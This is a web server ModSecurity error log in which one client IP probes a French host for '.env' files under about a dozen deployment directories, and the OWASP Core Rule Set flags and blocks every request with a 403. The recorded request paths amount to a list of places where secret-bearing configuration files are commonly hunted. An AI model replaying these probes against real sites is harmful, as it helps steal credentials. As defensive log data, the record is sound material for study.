[Mon May 11 17:22:45.408182 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agH0RUWKUxpmnkK7zHySSgAAAQs"]
[Mon May 11 17:22:45.408672 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agH0RUWKUxpmnkK7zHySSgAAAQs"]
[Mon May 11 17:22:45.408913 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agH0RUWKUxpmnkK7zHySSgAAAQs"]
[Mon May 11 17:22:45.572513 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/current/.env"] [unique_id "agH0RUWKUxpmnkK7zHySTAAAAQs"]
[Mon May 11 17:22:45.572998 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/current/.env"] [unique_id "agH0RUWKUxpmnkK7zHySTAAAAQs"]
[Mon May 11 17:22:45.573221 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/current/.env"] [unique_id "agH0RUWKUxpmnkK7zHySTAAAAQs"]
[Mon May 11 17:22:45.735629 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /release/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/release/.env"] [unique_id "agH0RUWKUxpmnkK7zHySTQAAAQs"]
[Mon May 11 17:22:45.736363 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/release/.env"] [unique_id "agH0RUWKUxpmnkK7zHySTQAAAQs"]
[Mon May 11 17:22:45.736690 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/release/.env"] [unique_id "agH0RUWKUxpmnkK7zHySTQAAAQs"]
[Mon May 11 17:22:45.898611 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /releases/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/releases/.env"] [unique_id "agH0RUWKUxpmnkK7zHySTgAAAQs"]
[Mon May 11 17:22:45.899364 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/releases/.env"] [unique_id "agH0RUWKUxpmnkK7zHySTgAAAQs"]
[Mon May 11 17:22:45.899677 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/releases/.env"] [unique_id "agH0RUWKUxpmnkK7zHySTgAAAQs"]
[Mon May 11 17:22:46.062134 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/shared/.env"] [unique_id "agH0RkWKUxpmnkK7zHySTwAAAQs"]
[Mon May 11 17:22:46.062633 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/shared/.env"] [unique_id "agH0RkWKUxpmnkK7zHySTwAAAQs"]
[Mon May 11 17:22:46.062865 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/shared/.env"] [unique_id "agH0RkWKUxpmnkK7zHySTwAAAQs"]
[Mon May 11 17:22:46.225310 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /deploy/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/deploy/.env"] [unique_id "agH0RkWKUxpmnkK7zHySUAAAAQs"]
[Mon May 11 17:22:46.225800 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/deploy/.env"] [unique_id "agH0RkWKUxpmnkK7zHySUAAAAQs"]
[Mon May 11 17:22:46.226028 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/deploy/.env"] [unique_id "agH0RkWKUxpmnkK7zHySUAAAAQs"]
[Mon May 11 17:22:46.398647 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /build/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/build/.env"] [unique_id "agH0RkWKUxpmnkK7zHySUQAAAQs"]
[Mon May 11 17:22:46.399139 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/build/.env"] [unique_id "agH0RkWKUxpmnkK7zHySUQAAAQs"]
[Mon May 11 17:22:46.399397 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/build/.env"] [unique_id "agH0RkWKUxpmnkK7zHySUQAAAQs"]
[Mon May 11 17:22:46.561035 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dist/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/dist/.env"] [unique_id "agH0RkWKUxpmnkK7zHySUgAAAQs"]
[Mon May 11 17:22:46.561559 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/dist/.env"] [unique_id "agH0RkWKUxpmnkK7zHySUgAAAQs"]
[Mon May 11 17:22:46.561802 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/dist/.env"] [unique_id "agH0RkWKUxpmnkK7zHySUgAAAQs"]
[Mon May 11 17:22:46.748924 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/public_html/.env"] [unique_id "agH0RkWKUxpmnkK7zHySUwAAAQs"]
[Mon May 11 17:22:46.749437 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/public_html/.env"] [unique_id "agH0RkWKUxpmnkK7zHySUwAAAQs"]
[Mon May 11 17:22:46.749710 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/public_html/.env"] [unique_id "agH0RkWKUxpmnkK7zHySUwAAAQs"]
[Mon May 11 17:22:46.912605 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /htdocs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/htdocs/.env"] [unique_id "agH0RkWKUxpmnkK7zHySVAAAAQs"]
[Mon May 11 17:22:46.913126 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/htdocs/.env"] [unique_id "agH0RkWKUxpmnkK7zHySVAAAAQs"]
[Mon May 11 17:22:46.913395 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/htdocs/.env"] [unique_id "agH0RkWKUxpmnkK7zHySVAAAAQs"]
[Mon May 11 17:22:47.074795 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/www/.env"] [unique_id "agH0R0WKUxpmnkK7zHySVQAAAQs"]
[Mon May 11 17:22:47.075322 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/www/.env"] [unique_id "agH0R0WKUxpmnkK7zHySVQAAAQs"]
[Mon May 11 17:22:47.075566 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/www/.env"] [unique_id "agH0R0WKUxpmnkK7zHySVQAAAQs"]
[Mon May 11 17:22:47.237861 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/html/.env"] [unique_id "agH0R0WKUxpmnkK7zHySVgAAAQs"]
[Mon May 11 17:22:47.238365 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/html/.env"] [unique_id "agH0R0WKUxpmnkK7zHySVgAAAQs"]
[Mon May 11 17:22:47.238611 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/html/.env"] [unique_id "agH0R0WKUxpmnkK7zHySVgAAAQs"]
[Mon May 11 17:22:47.401412 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/live/.env"] [unique_id "agH0R0WKUxpmnkK7zHySWAAAAQs"]
[Mon May 11 17:22:47.401876 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/live/.env"] [unique_id "agH0R0WKUxpmnkK7zHySWAAAAQs"]
[Mon May 11 17:22:47.402097 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/live/.env"] [unique_id "agH0R0WKUxpmnkK7zHySWAAAAQs"]
